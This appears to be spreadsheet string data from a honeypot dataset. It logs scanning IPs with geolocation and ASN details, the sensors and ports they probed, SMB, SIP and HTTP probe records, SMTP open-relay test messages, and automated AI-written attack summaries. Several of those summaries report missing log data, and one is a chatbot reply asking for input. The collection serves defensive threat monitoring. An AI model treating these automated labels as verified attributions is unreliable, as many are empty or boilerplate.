    <t>25&amp;&amp;10734&amp;&amp;63318&amp;&amp;60739&amp;&amp;46340&amp;&amp;60484&amp;&amp;28328&amp;&amp;13302&amp;&amp;42068&amp;&amp;38756&amp;&amp;63070&amp;&amp;37050&amp;&amp;47192&amp;&amp;48184&amp;&amp;16214&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:sip']</t>
  </si>
  <si>
    <t>LI</t>
  </si>
  <si>
    <t>Limburg</t>
  </si>
  <si>
    <t>Kerkrade Municipality</t>
  </si>
  <si>
    <t>Eygelshoven</t>
  </si>
  <si>
    <t>2756285</t>
  </si>
  <si>
    <t>6471</t>
  </si>
  <si>
    <t>50.8956</t>
  </si>
  <si>
    <t>6.06924</t>
  </si>
  <si>
    <t>214940</t>
  </si>
  <si>
    <t>KPROHOST LLC</t>
  </si>
  <si>
    <t>Kprohost LLC</t>
  </si>
  <si>
    <t>Pitline Ltd</t>
  </si>
  <si>
    <t>{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '5.180.55.39_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 23 Mar 2025 09:54:12 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 24 Mar 2025 13:05:26 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 1 Apr 2025 13:42:26 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}</t>
  </si>
  <si>
    <t>::ffff:c3d3:bf37</t>
  </si>
  <si>
    <t>high&amp;&amp;medium</t>
  </si>
  <si>
    <t>6418a6d666a50ec70162ead5c5d9ccf4</t>
  </si>
  <si>
    <t>45.226.5.29</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>SP</t>
  </si>
  <si>
    <t>São Paulo</t>
  </si>
  <si>
    <t>São Bernardo do Campo</t>
  </si>
  <si>
    <t>3449344</t>
  </si>
  <si>
    <t>-23.6939</t>
  </si>
  <si>
    <t>-46.565</t>
  </si>
  <si>
    <t>266953</t>
  </si>
  <si>
    <t>ARGO PROVEDOR DE INTERNET LTDA</t>
  </si>
  <si>
    <t>Argo Provedor De Internet Ltda</t>
  </si>
  <si>
    <t>::ffff:2de2:51d</t>
  </si>
  <si>
    <t>7712095bb4f941e9f5e50fa23509f870</t>
  </si>
  <si>
    <t>87.236.176.253</t>
  </si>
  <si>
    <t>luminous.monitoring.internet-measurement.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Encryption Misuse</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_VNC_H28&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_IRC_H46&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_IRC_H18&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_REDIS_H13&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_SIP_H6&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_SOCKS5_H14&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_SOCKS5_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;6379&amp;&amp;5900&amp;&amp;45324&amp;&amp;21&amp;&amp;1521&amp;&amp;22&amp;&amp;29252&amp;&amp;5432&amp;&amp;9100&amp;&amp;1080&amp;&amp;NA&amp;&amp;1433&amp;&amp;6667&amp;&amp;3389&amp;&amp;445&amp;&amp;23&amp;&amp;110&amp;&amp;143&amp;&amp;80&amp;&amp;389&amp;&amp;55171&amp;&amp;25&amp;&amp;3306</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;request&amp;&amp;login&amp;&amp;GET&amp;&amp;query&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'rqkmlbmg', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.253;tag=rqkmlbmg', 'max-forwards': '0', 'to': 'sip:5.253.43.207', 'via': 'SIP/2.0/UDP 87.236.176.253:5060;branch=z9hG4bKrqkmlbmg;received=87.236.176.253;rport=33489'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.253,33353)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.253,49281)}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.97.67:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.253,46079)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.253,56329)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.253,58347)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.253,41473)}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}</t>
  </si>
  <si>
    <t>::ffff:57ec:b0fd</t>
  </si>
  <si>
    <t>No malicious activity detected, no log data provided. &amp;&amp; No log data provided, unable to analyze malicious activity. &amp;&amp; This log indicates a failed attempt to connect using SOCKS5 protocol, likely an attacker probing for vulnerabilities or attempting to use the service maliciously. The lack of specific information suggests a reconnaissance or exploratory action. This activity is unusual and warrants further investigation. &amp;&amp; The log data is empty, indicating no malicious activity was detected yet or there is insufficient data to determine any suspicious behavior. &amp;&amp; This log indicates that there was an attempt to access POP3 service, but no further information is available due to lack of data. This could be indicative of a scanning or probing activity by malicious entities. The absence of additional details makes it difficult to determine the nature of this activity. &amp;&amp; No SMTP login attempt was made as there is no associated data for this protocol.</t>
  </si>
  <si>
    <t>SMTP TLS</t>
  </si>
  <si>
    <t>e7174f327b46de144fde591b03046c06</t>
  </si>
  <si>
    <t>123.30.240.80</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SSH_H24&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;59987&amp;&amp;445&amp;&amp;NA</t>
  </si>
  <si>
    <t>Vietnam Posts and Telecommunications Group</t>
  </si>
  <si>
    <t>2007-01-11</t>
  </si>
  <si>
    <t>VNPT-VN</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,50293)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,50337)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,60420)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,62196)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,52645)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,53614)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,52345)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,52400)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,61804)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,61867)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (123.30.240.80,52635)}</t>
  </si>
  <si>
    <t>::ffff:7b1e:f050</t>
  </si>
  <si>
    <t>No log data provided. &amp;&amp; The log indicates multiple attempts to access different services, possibly scanning for vulnerabilities or attempting brute-force attacks. The high volume of requests suggests a targeted effort to exploit weaknesses. This behavior is characteristic of reconnaissance and potential exploitation activities.</t>
  </si>
  <si>
    <t>I'd be happy to analyze the log data! However, it seems like there's no data provided. Could you please provide the actual log data so I can assist you in identifying the type of attack? 
Once I receive the data, I'll name the type of attack in a short phrase (max 2 words).</t>
  </si>
  <si>
    <t>3c8ae6ae6910295118004742dffa1a9a</t>
  </si>
  <si>
    <t>193.151.147.141</t>
  </si>
  <si>
    <t>IR</t>
  </si>
  <si>
    <t>Iran</t>
  </si>
  <si>
    <t>Tehran</t>
  </si>
  <si>
    <t>Shahrestān-e Tehrān</t>
  </si>
  <si>
    <t>112931</t>
  </si>
  <si>
    <t>35.7282</t>
  </si>
  <si>
    <t>51.4258</t>
  </si>
  <si>
    <t>60077</t>
  </si>
  <si>
    <t>Asre Dadeha Asiatech</t>
  </si>
  <si>
    <t>IR-AT</t>
  </si>
  <si>
    <t>::ffff:c197:938d</t>
  </si>
  <si>
    <t>0b2f58bbb3cde0229cdc2cb43a373cf2</t>
  </si>
  <si>
    <t>134.122.169.142</t>
  </si>
  <si>
    <t>SMA-LAB_DHCP_H2&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H27</t>
  </si>
  <si>
    <t>67&amp;&amp;37650&amp;&amp;1433&amp;&amp;NA</t>
  </si>
  <si>
    <t>{'dnsbl-3.uceprotect.net': ['unknown']}</t>
  </si>
  <si>
    <t>HEA</t>
  </si>
  <si>
    <t>Eastern</t>
  </si>
  <si>
    <t>Chai Wan</t>
  </si>
  <si>
    <t>1820002</t>
  </si>
  <si>
    <t>22.2661</t>
  </si>
  <si>
    <t>114.247</t>
  </si>
  <si>
    <t>152194</t>
  </si>
  <si>
    <t>CTG Server Limited</t>
  </si>
  <si>
    <t>Rackip Consultancy Pte. LTD</t>
  </si>
  <si>
    <t>BGP Network Limited Co., Ltd</t>
  </si>
  <si>
    <t>1989-05-23</t>
  </si>
  <si>
    <t>CTG163-191-JP</t>
  </si>
  <si>
    <t>::ffff:867a:a98e</t>
  </si>
  <si>
    <t>24d430c0a06d0f8b2c6a3f15762ac6de</t>
  </si>
  <si>
    <t>103.164.116.122</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;36488&amp;&amp;NA</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}</t>
  </si>
  <si>
    <t>Kota</t>
  </si>
  <si>
    <t>-6.1967</t>
  </si>
  <si>
    <t>106.822</t>
  </si>
  <si>
    <t>17995</t>
  </si>
  <si>
    <t>PT iForte Global Internet</t>
  </si>
  <si>
    <t>SOLUSINET</t>
  </si>
  <si>
    <t>2021-03-17</t>
  </si>
  <si>
    <t>SOLUSINET-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,63735)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,58358)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,51591)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,52583)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,54913)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,55898)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,50998)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,52437)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,49987)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,50306)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,60281)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,60292)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,60295)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,60296)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,60300)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,60317)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,60320)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,61218)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,61909)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,54239)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,58061)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,59074)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,56306)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,56863)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,62632)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,63130)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,52724)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,53236)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,57831)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,52096)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,54211)}</t>
  </si>
  <si>
    <t>::ffff:67a4:747a</t>
  </si>
  <si>
    <t>A suspicious incoming connection was detected from an unknown IP address, which may indicate an attempted unauthorized access or a potential malware spread. The connection originated from 103.164.116.122 to port 57831. This could be a sign of a malicious entity probing the system for vulnerabilities. &amp;&amp; There is no log data provided, so there is nothing to analyze.</t>
  </si>
  <si>
    <t>SMB Scanning &amp;&amp; SMB Scanning &amp;&amp; Port Scan &amp;&amp; SMB Scanning</t>
  </si>
  <si>
    <t>11b1c0a85dd5dee23913a955703cfae7</t>
  </si>
  <si>
    <t>213.109.64.248</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H42&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;1051&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>KG</t>
  </si>
  <si>
    <t>Kyrgyzstan</t>
  </si>
  <si>
    <t>Bishkek</t>
  </si>
  <si>
    <t>1528675</t>
  </si>
  <si>
    <t>42.8746</t>
  </si>
  <si>
    <t>74.5698</t>
  </si>
  <si>
    <t>12764</t>
  </si>
  <si>
    <t>AKNET Ltd.</t>
  </si>
  <si>
    <t>2009-08-31</t>
  </si>
  <si>
    <t>::ffff:d56d:40f8</t>
  </si>
  <si>
    <t>e3a8ddf4b256b71af350b101c163b907</t>
  </si>
  <si>
    <t>117.206.52.107</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>2007-08-01</t>
  </si>
  <si>
    <t>BB-Multiplay</t>
  </si>
  <si>
    <t>::ffff:75ce:346b</t>
  </si>
  <si>
    <t>9ec160e8fc38d19cf5e613c30fd4b451</t>
  </si>
  <si>
    <t>103.175.188.37</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_SMB_H11&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H31&amp;&amp;SMA-LAB_MSSQL_H20&amp;&amp;SMA-LAB_SMB_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;NA</t>
  </si>
  <si>
    <t>North Sulawesi</t>
  </si>
  <si>
    <t>Kabupaten Minahasa Utara</t>
  </si>
  <si>
    <t>Tatelu</t>
  </si>
  <si>
    <t>1624619</t>
  </si>
  <si>
    <t>1.5307</t>
  </si>
  <si>
    <t>124.948</t>
  </si>
  <si>
    <t>134658</t>
  </si>
  <si>
    <t>PT JULIA MULTIMEDIA NUSANTARA</t>
  </si>
  <si>
    <t>2021-11-03</t>
  </si>
  <si>
    <t>IDNIC-ARTHACOM-ID</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,61102)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,65139)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,65240)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,54471)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,54625)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,60005)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,62130)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,62235)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,61554)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,61633)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,62401)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,50022)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,50045)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,49656)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,49659)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,50084)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,60308)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,60386)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,51356)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,51390)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,51872)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,63603)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,63628)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,64090)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,53374)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,53840)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,56923)}&amp;&amp;{Data_SMB:Incoming connection 